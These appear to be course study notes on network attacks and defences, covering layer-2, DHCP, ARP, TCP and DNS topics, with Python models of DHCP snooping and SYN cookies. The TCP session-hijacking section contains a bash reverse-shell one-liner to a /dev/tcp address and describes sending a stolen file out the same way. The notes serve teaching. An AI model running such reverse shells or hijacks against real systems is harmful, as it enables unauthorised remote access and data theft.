  • CAM table: mapping between physical port (layer 1) and MAC address (layer 2)
  • It is physical memory, limited in size, and thus susceptible to overflow attacks
  • CAM overflow attack: send junk data to the switch to fill its memory. Once memory is full, it starts acting like a hub (sends data out on every port)
  • Countermeasure: port security - limits the number of source MAC addresses on a port (basically binds the MAC address to that port for some amount of time, known as the CAM aging time)
  • Why port security often isn’t implemented: clients can’t switch between ports; these days there’s lots of virtualization, so a VM might send a different MAC address; lots of overhead to keep things working; plugging into another Ethernet port will shut the port down.
  • Sending syslog from the switch to a SIEM is a better way to handle these attacks.

VLAN hopping attacks

  • Trunk port (as opposed to access port): allows multiple VLANs to communicate over one link (like the trunk of a tree); uses a VLAN tag
  • Switch spoofing attack: make the switch think that you are also a switch, then negotiate trunking.
    • Auto-trunking was turned on by default previously; nowadays that has been changed.
  • VLAN hopping attack: change the VLAN of your packet using double encapsulation
    • The attacker needs to be on the native VLAN (VLAN 1). Possible because on a network some machines are on VLANs while others are not explicitly configured and so end up on VLAN 1.
    • Double 802.1Q encapsulation: still a valid attack nowadays. The attacker needs to be part of the native VLAN (usually VLAN 1)
    • Mitigation: VLAN 1 carries management traffic; do not use VLAN 1 for user traffic

DHCP Attacks

  • DORA: Discover, Offer, Request, Acknowledge
  • The DHCP header has a copy of the source MAC address in the CHADDR (Client Hardware Address) field. This field is required because the packet may go into another subnet through a router.
  • DHCP starvation attack: the attacker takes up all the available DHCP IP addresses using various random source MAC addresses.
    • DHCP Gobbler looks at the whole scope and tries to lease all the available DHCP addresses so that a DoS happens (the server assigns leases per MAC address, so random MAC addresses are required)
    • Easy attack; still works today
    • To prevent: port security - limit the number of source MAC addresses seen in the Ethernet header. This won’t stop Gobbler, though, since it uses random MAC addresses in the CHADDR field while keeping a constant MAC address in the Ethernet source field.
    • A DHCP NAK can be sent to the client by the attacker; this forces the client to resend the DHCP Discover broadcast, which the attacker can answer to become MITM.
  • Become a rogue DHCP server and give out bad information to the clients requesting DHCP leases - change the default gateway, DNS server, etc.
    • Change the default gateway and become the MITM
    • Change the DNS server, point users to phishing websites and steal credentials
    • Prevention: DHCP snooping
      • Creates a DHCP snooping/binding table by snooping the DHCP replies to clients: records MAC address, IP address and lease time
      • Interfaces are set to trusted or untrusted: untrusted ports can only send Discover and Request; trusted ports can send Offer, ACK, NAK
      • Matches the MAC address in the Ethernet header against the one in the DHCP header
      • Thus figures out issues in the network
    • Prevention 2: block packets from client ports with destination port 68 (Offer/ACK/NAK messages are sent to port 68). Then only the legitimate DHCP server will be able to send those.

ARP Attacks

  • Ettercap for ARP attacks
  • Gratuitous ARP replies (allowed by the ARP RFC, but may be disabled in practice on devices)
  • Countermeasure to ARP attacks: Dynamic ARP Inspection (DAI), available on expensive Cisco devices
    • Uses the DHCP snooping binding table: inspects ARP packets and matches them against the binding table.

Spoofing Attacks

  • IP spoofing - very easy
  • Countermeasures:
    • IP Source Guard (IPSG): looks at the source IP address of every packet and compares it with the DHCP snooping binding table.
    • Present only in very expensive devices. Very CPU- and memory-intensive.
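An added example (not the notes’ or any vendor’s code) modelling the three countermeasures from the DHCP, ARP and spoofing sections above, DHCP snooping, Dynamic ARP Inspection and IP Source Guard, around one binding table. Port names, MAC and IP addresses and the trusted uplink are assumptions of the example.

```python
from dataclasses import dataclass

SERVER_MSGS = {"OFFER", "ACK", "NAK"}   # may only come from trusted ports
CLIENT_MSGS = {"DISCOVER", "REQUEST"}    # all that an untrusted port may send


@dataclass
class Binding:
    mac: str
    ip: str
    port: str
    lease: int


class SnoopingSwitch:
    """Simplified model of DHCP snooping, DAI and IPSG on one switch."""

    def __init__(self, trusted_ports):
        self.trusted = set(trusted_ports)
        self.bindings = {}   # client MAC -> Binding (the snooping binding table)
        self.pending = {}    # client MAC -> port that sent its DISCOVER/REQUEST

    def dhcp(self, port, eth_src, msg_type, chaddr, yiaddr=None, lease=0):
        """Filter one DHCP message seen on `port`; return 'forward' or 'drop: <why>'."""
        if port not in self.trusted:
            if msg_type in SERVER_MSGS:
                return "drop: server message from untrusted port (rogue DHCP server)"
            if chaddr != eth_src:   # CHADDR must match the Ethernet source address
                return "drop: CHADDR does not match Ethernet source (starvation attempt)"
            self.pending[chaddr] = port
        elif msg_type == "ACK" and chaddr in self.pending:
            # Snoop the reply to the client and record who got which address on which port.
            self.bindings[chaddr] = Binding(chaddr, yiaddr, self.pending.pop(chaddr), lease)
        return "forward"

    def _bound(self, port, mac, ip):
        b = self.bindings.get(mac)
        return b is not None and b.ip == ip and b.port == port

    def arp(self, port, sender_mac, sender_ip):
        """Dynamic ARP Inspection: the sender MAC/IP of an ARP packet on an untrusted
        port must match a binding learned on that port."""
        if port in self.trusted or self._bound(port, sender_mac, sender_ip):
            return "forward"
        return "drop: ARP sender does not match binding table (ARP spoofing)"

    def ip(self, port, eth_src, src_ip):
        """IP Source Guard: the same check applied to the source IP of every packet."""
        if port in self.trusted or self._bound(port, eth_src, src_ip):
            return "forward"
        return "drop: source IP does not match binding table (IP spoofing)"


def run_scenario():
    """Constructed scenario: one legitimate DORA exchange, then each attack from the notes."""
    sw = SnoopingSwitch(trusted_ports={"Gi0/24"})   # Gi0/24 is the uplink to the real DHCP server
    alice, rogue, server = "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:02", "00:11:22:33:44:55"
    results = {}
    sw.dhcp("Gi0/1", alice, "DISCOVER", alice)
    sw.dhcp("Gi0/24", server, "OFFER", alice, yiaddr="10.0.0.10", lease=3600)
    sw.dhcp("Gi0/1", alice, "REQUEST", alice)
    results["ack"] = sw.dhcp("Gi0/24", server, "ACK", alice, yiaddr="10.0.0.10", lease=3600)
    results["rogue_offer"] = sw.dhcp("Gi0/2", rogue, "OFFER", alice, yiaddr="10.0.0.77")
    results["gobbler"] = sw.dhcp("Gi0/2", rogue, "DISCOVER", "de:ad:be:ef:00:01")  # random CHADDR
    results["arp_ok"] = sw.arp("Gi0/1", alice, "10.0.0.10")
    results["arp_spoof"] = sw.arp("Gi0/2", rogue, "10.0.0.1")     # claims to be the gateway
    results["ip_spoof"] = sw.ip("Gi0/2", rogue, "10.0.0.10")      # claims Alice's address
    results["ip_ok"] = sw.ip("Gi0/1", alice, "10.0.0.10")
    results["binding"] = sw.bindings[alice]
    return results


if __name__ == "__main__":
    for k, v in run_scenario().items():
        print(f"{k:12} {v}")
```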

Other Layer 2 protocols:

  • Spanning Tree Protocol (STP): used within enterprises to create a loop-free topology by electing a root switch.
    • Attack: the attacker sends BPDU messages claiming “I have the highest bandwidth etc., I’ll become root.”
    • Mitigation:
      • BPDU Guard: ensures that BPDU messages are only accepted from other switches.
      • Root Guard: limits the number of devices that can become root.

TCP and its Attacks

  • TCP is a connection-oriented protocol: it always needs to establish a handshake before sending data.
  • The OS assigns a random port to clients when they call connect()
  • A server usually needs two sockets for TCP - one to bind to (and listen on) and one for each incoming connection (the fd returned by accept())
  • TCP has sequence numbers in its headers to place the packets correctly
  • Not every packet is acknowledged; the receiver just sends the last received sequence number to indicate that everything before it has been received correctly.

Attacks

  • SYN Flooding: details about half-open connections are stored in a Transmission Control Block (TCB) on the server. Half-open means the server has received a SYN and sent a SYN-ACK but has not yet received the ACK. The goal is to fill up the half-open connection queue so the server cannot accept any more new connections. If the client finishes the 3-way handshake, the record leaves the TCB since it is no longer a half-open connection. A server receiving RST will also dequeue the record. Timeout is the only defense. Firewalls are a defense too, but by using random source IPs they can be avoided. The random IPs likely won’t exist, so no ACK comes; but an RST will, and that dequeues the record. The countermeasure, enabled by default in modern OSes, is to stop allocating resources for SYNs once it detects too many half-open connections; it then uses SYN cookies to prevent ACK flooding/spoofing.
  • TCP Reset Attack: there are two ways to close a connection - FIN→ACK→FIN→ACK, or an RST from one side. This attack takes advantage of the RST way: spoof a packet from A to B carrying RST, and it will break the connection between A and B. An SSH connection can also be broken, because SSH does its encryption at the transport layer: only the data in the TCP packet is encrypted, the headers are not. We can spoof using the sequence number obtained from the headers and drop the connection with an RST packet carrying those details. Video streaming like YouTube or Netflix can likely also be stopped this way if you have a fast program (Python might be too slow) to sniff the connection and spoof an RST packet.
  • TCP Session Hijacking: a TCP session is uniquely identified by source and destination IP and ports (the signature of the TCP session). An approximately correct sequence number is also required, otherwise the receiver discards the data. A file can be stolen via session hijacking by printing it and redirecting the output to /dev/tcp/ip/port using the bash command. The actual connection freezes after session hijacking because the legitimate user’s and server’s sequence numbers get mismatched. bash reverse shell: \r /bin/bash -i > /dev/tcp/172.16.0.192/9090 2>&1 0<&1 \r
  • You can take Alice offline so that the hijacked session is not limited to 1 command.
  • Or you can do a MITM (AITM) attack; everything Alice does is then under the attacker’s full control (like a proxy)
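An added example, not from the notes, of the SYN-cookie countermeasure described under SYN flooding above: a listener that keeps TCBs until its backlog fills and then answers further SYNs with stateless cookies it can verify on the final ACK, so a real client still connects during a flood. The cookie layout, MSS table and addresses are assumptions of this example, not the Linux implementation.

```python
import hashlib
import hmac
import os

MSS_TABLE = [536, 1220, 1440, 1460]   # MSS values encodable in the cookie's 3-bit index
SECRET = os.urandom(16)               # per-boot server secret (constructed here)
LISTEN_ADDR, LISTEN_PORT = "192.0.2.10", 443


def _hash24(saddr, daddr, sport, dport, counter):
    msg = f"{saddr}|{daddr}|{sport}|{dport}|{counter}".encode()
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")


def make_syn_cookie(saddr, daddr, sport, dport, client_mss, counter):
    """ISN layout (32 bits): 5-bit time counter | 3-bit MSS index | 24-bit keyed hash.
    `counter` is a coarse clock (e.g. minutes); the server stores nothing for the SYN."""
    idx = max((i for i, m in enumerate(MSS_TABLE) if m <= client_mss), default=0)
    return ((counter & 0x1F) << 27) | (idx << 24) | _hash24(saddr, daddr, sport, dport, counter)


def check_syn_cookie(saddr, daddr, sport, dport, ack_number, counter_now, max_age=1):
    """Validate the handshake's final ACK (ack = cookie + 1). Returns the MSS encoded in
    the cookie, or None if the cookie is forged, for another 4-tuple, or too old."""
    cookie = (ack_number - 1) & 0xFFFFFFFF
    t, idx, h = cookie >> 27, (cookie >> 24) & 0x7, cookie & 0xFFFFFF
    for age in range(max_age + 1):
        counter = counter_now - age
        if (counter & 0x1F) == t and _hash24(saddr, daddr, sport, dport, counter) == h:
            return MSS_TABLE[idx] if idx < len(MSS_TABLE) else MSS_TABLE[0]
    return None


class Listener:
    """Listening-socket model: keeps TCBs for half-open connections up to `backlog`,
    then switches to stateless SYN cookies instead of refusing new clients."""

    def __init__(self, backlog=64):
        self.backlog, self.half_open, self.established = backlog, {}, set()
        self.cookies_sent = 0

    def on_syn(self, saddr, sport, mss, counter):
        key = (saddr, sport)
        if len(self.half_open) < self.backlog:
            isn = int.from_bytes(os.urandom(4), "big")
            self.half_open[key] = (isn, mss)       # normal half-open TCB
            return isn
        self.cookies_sent += 1                     # queue full: no state allocated
        return make_syn_cookie(saddr, LISTEN_ADDR, sport, LISTEN_PORT, mss, counter)

    def on_ack(self, saddr, sport, ack_number, counter):
        key = (saddr, sport)
        if key in self.half_open:
            isn, _ = self.half_open.pop(key)
            ok = ack_number == (isn + 1) & 0xFFFFFFFF
        else:   # no TCB: the ACK must carry a valid cookie or it is an ACK-flood packet
            ok = check_syn_cookie(saddr, LISTEN_ADDR, sport, LISTEN_PORT, ack_number, counter) is not None
        if ok:
            self.established.add(key)
        return ok


def simulate_flood(n_spoofed=200, backlog=8, counter=1000):
    """Constructed flood: n_spoofed SYNs from random sources that never ACK, then one real
    client; with cookies the real client still completes its handshake."""
    srv = Listener(backlog)
    for i in range(n_spoofed):
        srv.on_syn(f"198.51.100.{i % 250}", 1024 + i, 1460, counter)
    isn = srv.on_syn("203.0.113.5", 40000, 1460, counter)
    legit = srv.on_ack("203.0.113.5", 40000, (isn + 1) & 0xFFFFFFFF, counter)
    forged = srv.on_ack("203.0.113.6", 40001, 0x12345678, counter)   # ACK without a cookie
    return {"half_open": len(srv.half_open), "cookies_sent": srv.cookies_sent,
            "legit_established": legit, "forged_accepted": forged}


if __name__ == "__main__":
    print(simulate_flood())
```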

DNS

DNS Servers

  • Recursive DNS server - usually maintained by the ISP, OpenDNS or Google DNS
  • Root name server - one of the 13 root name servers present on the internet across the world. Gives the address of the .edu TLD server
  • Top-level domain name server (TLD) - the .edu TLD server gives the IP of the nyu.edu DNS server
  • Authoritative name server - query nyu.edu for the IP of engineering.nyu.edu for the final request

Records

  • DNS records = zone files
  • A record: IP address of a domain
  • CNAME: a CNAME record points to the root domain (for engineering.nyu.edu the CNAME is nyu.edu) (used to forward domains to other domains - how?)
  • MX record: Mail Exchanger records - direct mail to another server
  • TXT record: lets users store arbitrary text

Packet Analysis

Wireshark

  • To extract a particular image from an HTTP stream, filter the stream and then use File→Export Objects→HTTP
  • The same can be done to analyse objects transferred through SMB or SMB2
  • TLS traffic can be decrypted in Wireshark if the RSA private key or a pre-master-secret log file is available.
    • Set the log file under Edit→Preferences→TLS

BPF Filters

  • Structure: <qualifier> <qualifier> <id>
  • Components: type (host/net/port/portrange), direction (src/dst/src or dst/src and dst) and protocol (ether/tcp/udp/ip/ip6/...)
  • Syntax cheat sheet: (BPF syntax table not captured in these notes)

TCPDump

  • -w: write packets to a pcap file
  • -r: read a pcap file
  • -n: prevent it from converting IPs to names
  • apply a filter directly while reading: e.g. tcpdump -r myfile.pcap ip host 1.1.1.1

Zeek